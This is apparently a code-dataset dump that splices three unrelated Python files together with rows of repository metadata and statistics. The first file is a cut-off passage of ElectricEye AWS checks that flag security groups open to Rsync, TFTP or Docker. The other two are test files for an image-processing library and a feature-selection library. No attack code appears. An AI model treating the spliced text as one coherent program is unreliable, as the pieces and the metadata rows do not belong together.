"Id": sgArn + "/" + ipProtocol + "/security-group-rsync-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.22] Security groups should not allow unrestricted Rsync (TCP 873) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Rsync (TCP 873) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "873" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rsync-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.22] Security groups should not allow unrestricted Rsync (TCP 873) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Rsync (TCP 873) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_tftp_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.23] Security groups should not allow unrestricted TFTP (UDP 69) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "69" and cidrIpRange == "0.0.0.0/0" and ipProtocol == "udp":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-tftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.23] Security groups should not allow unrestricted TFTP (UDP 69) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted TFTP (UDP 69) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "69" and cidrIpRange != "0.0.0.0/0" and ipProtocol == "udp":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-tftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.23] Security groups should not allow unrestricted TFTP (UDP 69) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted TFTP (UDP 69) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_docker_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.24] Security groups should not allow unrestricted Docker (TCP 2375) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "2375" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-docker-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[SecurityGroup.24] Security groups should not allow unrestricted Docker (TCP 2375) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Docker (TCP 2375) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "2375" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-docker-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.24] Security groups should not allow unrestricted Docker (TCP 2375) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Docker (TCP 2375) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue | 55.483966 | 282 | 0.413533 | 16,749 | 226,652 | 5.581766 | 0.026151 | 0.033373 | 0.023104 | 0.028239 | 0.987934 | 0.987731 | 0.987731 | 0.983388 | 0.979474 | 0.974767 | 0 | 0.064484 | 0.491701 | 226,652 | 4,085 | 283 | 55.483966 | 0.747003 | 0.013655 | 0 | 0.86145 | 0 | 0.037877 | 0.356659 | 0.035726 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00623 | false | 0.005981 | 0.000748 | 0 | 0.007476 | 0.017443 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
25dd5514913ac597638a5910a2757191aa413eaf | 1,146 | py | Python | tests/test_sum_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 64 | 2020-03-18T12:11:22.000Z | 2022-03-31T08:19:18.000Z | tests/test_sum_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 148 | 2020-05-14T06:14:11.000Z | 2022-03-26T15:02:31.000Z | tests/test_sum_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 16 | 2020-05-31T00:53:44.000Z | 2022-03-23T13:20:57.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_sum_of_all_pixels_3d():
test1 = cle.push(np.asarray([
[
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 2, 0, 0]
]
]))
s = cle.sum_of_all_pixels(test1)
assert s == 20
def test_sum_of_all_pixels_2d():
test1 = cle.push(np.asarray([
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 2, 0, 0]
]))
s = cle.sum_of_all_pixels(test1)
assert s == 20
def test_sum_of_all_pixels_1d():
test1 = cle.push(np.asarray(
[0, 4, 0, 0, 2]
))
s = cle.sum_of_all_pixels(test1)
assert s == 6
def test_sum_of_all_pixels_1d_y():
test1 = cle.push(np.asarray(
[[0], [4], [0], [0], [2]]
))
s = cle.sum_of_all_pixels(test1)
assert s == 6
def test_sum_of_all_pixels_1d_z():
test1 = cle.push(np.asarray(
[[[0]], [[4]], [[0]], [[0]], [[2]]]
))
s = cle.sum_of_all_pixels(test1)
assert s == 6
| 19.1 | 47 | 0.466841 | 186 | 1,146 | 2.645161 | 0.166667 | 0.109756 | 0.085366 | 0.284553 | 0.890244 | 0.890244 | 0.847561 | 0.843496 | 0.843496 | 0.843496 | 0 | 0.118046 | 0.356894 | 1,146 | 59 | 48 | 19.423729 | 0.549525 | 0 | 0 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 1 | 0.119048 | false | 0 | 0.047619 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d350bb9b62ad027f30840ef90fb50efb1e318f02 | 11,411 | py | Python | test_jostar.py | amirhszd/jostar | 26a6769ca40081383537f5b38bdb1777c104f00b | [
"MIT"
] | 5 | 2021-07-09T17:59:25.000Z | 2021-09-18T21:29:40.000Z | test_jostar.py | amirhszd/jostar | 26a6769ca40081383537f5b38bdb1777c104f00b | [
"MIT"
] | 1 | 2021-09-19T18:38:55.000Z | 2021-09-28T18:15:48.000Z | test_jostar.py | amirhszd/jostar | 26a6769ca40081383537f5b38bdb1777c104f00b | [
"MIT"
] | 2 | 2021-07-12T14:03:16.000Z | 2021-07-23T11:11:38.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 31 14:57:23 2021
@author: Amirh
"""
from sklearn.datasets import make_classification, make_regression
from sklearn.metrics import r2_score
from jostar.algorithms import ACO, GA, SA, PSO, PlusLMinusR, DE, NSGA2, SBS, SFS
from sklearn.svm import SVR, SVC
from sklearn.base import is_classifier, is_regressor
from sklearn.model_selection import KFold
import warnings
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
import matplotlib
def eval_opt_model_output_regression(opt_model, n_f):
rank_models = ["GA", "SA", "PSO", "ACO", "DE"]
seq_models = ["PlusLMinusR", "SFS", "SBS"]
if opt_model._name_ in rank_models:
assert len(opt_model.best_fits) == 1
assert len(opt_model.best_sol) == n_f
assert is_regressor(opt_model.model_best)
assert len(opt_model.rankings) == 2
assert opt_model.display_results() is not None
elif opt_model._name_ in seq_models:
if opt_model._name_ != "SBS":
assert len(opt_model.best_fits) == n_f
assert len(opt_model.best_sol) == n_f
assert is_regressor(opt_model.model_best)
assert opt_model.display_results() is not None
else:
assert len(opt_model.best_sol) == n_f
assert is_regressor(opt_model.model_best)
assert opt_model.display_results() is not None
else:
result_df = opt_model.res_df
assert isinstance(result_df, pd.core.frame.DataFrame)
assert opt_model.display_results(0) is not None
plt.close('all')
pbar.update(1)
def eval_opt_model_output_classification(opt_model, n_f):
rank_models = ["GA", "SA", "PSO", "ACO", "DE"]
seq_models = ["PlusLMinusR", "SFS", "SBS"]
if opt_model._name_ in rank_models:
assert len(opt_model.best_fits) == 1
assert len(opt_model.best_sol) == n_f
assert is_classifier(opt_model.model_best)
rank_models = ["GA", "SA", "PSO", "ACO", "DE"]
if opt_model._name_ in rank_models:
assert len(opt_model.rankings) == 2
assert opt_model.display_results() is not None
elif opt_model._name_ in seq_models:
if opt_model._name_ != "SBS":
assert len(opt_model.best_fits) == n_f
assert len(opt_model.best_sol) == n_f
assert is_classifier(opt_model.model_best)
assert opt_model.display_results() is not None
else:
assert len(opt_model.best_sol) == n_f
assert is_classifier(opt_model.model_best)
assert opt_model.display_results() is not None
else:
result_df = opt_model.res_df
assert isinstance(result_df, pd.core.frame.DataFrame)
assert opt_model.display_results(0) is not None
plt.close('all')
pbar.update(1)
def test_all_regression():
global pbar
cv = KFold(5)
n_f = 5
x, y = make_regression(100, 10)
model = SVR()
# regression
# with CV
pbar = tqdm(total=18)
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=cv, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=cv, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=cv, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
lrs_opt_model = PlusLMinusR(model, n_f, +1, r2_score, cv=cv, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=cv, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=cv, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=cv, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True)
sa_opt_model.fit(x, y, decor=0.95, scale=True)
de_opt_model.fit(x, y, decor=0.95, scale=True)
aco_opt_model.fit(x, y, decor=0.95, scale=True)
pso_opt_model.fit(x, y, decor=0.95, scale=True)
lrs_opt_model.fit(x, y, decor=0.95, scale=True)
nsga_opt_model.fit(x, y, decor=0.95, scale=True)
sbs_opt_model.fit(x, y, decor=0.95, scale=True)
sfs_opt_model.fit(x, y, decor=0.95, scale=True)
eval_opt_model_output_regression(ga_opt_model, n_f)
eval_opt_model_output_regression(sa_opt_model, n_f)
eval_opt_model_output_regression(de_opt_model, n_f)
eval_opt_model_output_regression(aco_opt_model, n_f)
eval_opt_model_output_regression(pso_opt_model, n_f)
eval_opt_model_output_regression(lrs_opt_model, n_f)
eval_opt_model_output_regression(nsga_opt_model, n_f)
eval_opt_model_output_regression(sbs_opt_model, n_f)
eval_opt_model_output_regression(sfs_opt_model, n_f)
# with test size
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=None, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=None, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=None, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
lrs_opt_model = PlusLMinusR(
model, n_f, +1, r2_score, cv=None, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=None, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=None, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=None, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sa_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
de_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
aco_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
pso_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
lrs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
nsga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sbs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sfs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
eval_opt_model_output_regression(ga_opt_model, n_f)
eval_opt_model_output_regression(sa_opt_model, n_f)
eval_opt_model_output_regression(de_opt_model, n_f)
eval_opt_model_output_regression(aco_opt_model, n_f)
eval_opt_model_output_regression(pso_opt_model, n_f)
eval_opt_model_output_regression(lrs_opt_model, n_f)
eval_opt_model_output_regression(nsga_opt_model, n_f)
eval_opt_model_output_regression(sbs_opt_model, n_f)
eval_opt_model_output_regression(sfs_opt_model, n_f)
def test_all_classification():
global pbar
cv = KFold(5)
n_f = 5
x, y = make_classification(100, 10)
model = SVC(probability=True)
# classification
# with CV
pbar = tqdm(total=18)
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=cv, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=cv, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=cv, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=cv, verbose=False)
lrs_opt_model = PlusLMinusR(model, n_f, +1, r2_score, cv=cv, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=cv, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=cv, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=cv, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True)
sa_opt_model.fit(x, y, decor=0.95, scale=True)
de_opt_model.fit(x, y, decor=0.95, scale=True)
aco_opt_model.fit(x, y, decor=0.95, scale=True)
pso_opt_model.fit(x, y, decor=0.95, scale=True)
lrs_opt_model.fit(x, y, decor=0.95, scale=True)
nsga_opt_model.fit(x, y, decor=0.95, scale=True)
sbs_opt_model.fit(x, y, decor=0.95, scale=True)
sfs_opt_model.fit(x, y, decor=0.95, scale=True)
eval_opt_model_output_classification(ga_opt_model, n_f)
eval_opt_model_output_classification(sa_opt_model, n_f)
eval_opt_model_output_classification(de_opt_model, n_f)
eval_opt_model_output_classification(aco_opt_model, n_f)
eval_opt_model_output_classification(pso_opt_model, n_f)
eval_opt_model_output_classification(lrs_opt_model, n_f)
eval_opt_model_output_classification(nsga_opt_model, n_f)
eval_opt_model_output_classification(sbs_opt_model, n_f)
eval_opt_model_output_classification(sfs_opt_model, n_f)
# with test size
ga_opt_model = GA(model, n_f, +1, r2_score, n_gen=1,
n_pop=20, cv=None, verbose=False)
sa_opt_model = SA(model, n_f, +1, r2_score, n_iter=1,
n_sub_iter=20, cv=None, verbose=False)
de_opt_model = DE(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
aco_opt_model = ACO(model, n_f, +1, r2_score, n_iter=1,
n_ant=20, cv=None, verbose=False)
pso_opt_model = PSO(model, n_f, +1, r2_score, n_iter=1,
n_pop=20, cv=None, verbose=False)
lrs_opt_model = PlusLMinusR(
model, n_f, +1, r2_score, cv=None, verbose=False)
nsga_opt_model = NSGA2(model, n_f, (+1, -1), r2_score,
n_gen=1, n_pop=20, cv=None, verbose=False)
sbs_opt_model = SBS(model, n_f, +1, r2_score, cv=None, verbose=False)
sfs_opt_model = SFS(model, n_f, +1, r2_score, cv=None, verbose=False)
ga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sa_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
de_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
aco_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
pso_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
lrs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
nsga_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sbs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
sfs_opt_model.fit(x, y, decor=0.95, scale=True, test_size=0.3)
eval_opt_model_output_classification(ga_opt_model, n_f)
eval_opt_model_output_classification(sa_opt_model, n_f)
eval_opt_model_output_classification(de_opt_model, n_f)
eval_opt_model_output_classification(aco_opt_model, n_f)
eval_opt_model_output_classification(pso_opt_model, n_f)
eval_opt_model_output_classification(lrs_opt_model, n_f)
eval_opt_model_output_classification(nsga_opt_model, n_f)
eval_opt_model_output_classification(sbs_opt_model, n_f)
eval_opt_model_output_classification(sfs_opt_model, n_f)
if __name__ == '__main__':
test_all_regression()
test_all_classification()
print(" ")
print("All tests passed!")
| 45.102767 | 80 | 0.67023 | 1,976 | 11,411 | 3.526822 | 0.062753 | 0.210073 | 0.074329 | 0.098149 | 0.918066 | 0.909026 | 0.909026 | 0.905869 | 0.905869 | 0.905869 | 0 | 0.037515 | 0.212777 | 11,411 | 252 | 81 | 45.281746 | 0.738283 | 0.012444 | 0 | 0.888889 | 0 | 0 | 0.009596 | 0 | 0 | 0 | 0 | 0 | 0.12963 | 1 | 0.018519 | false | 0.00463 | 0.050926 | 0 | 0.069444 | 0.009259 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
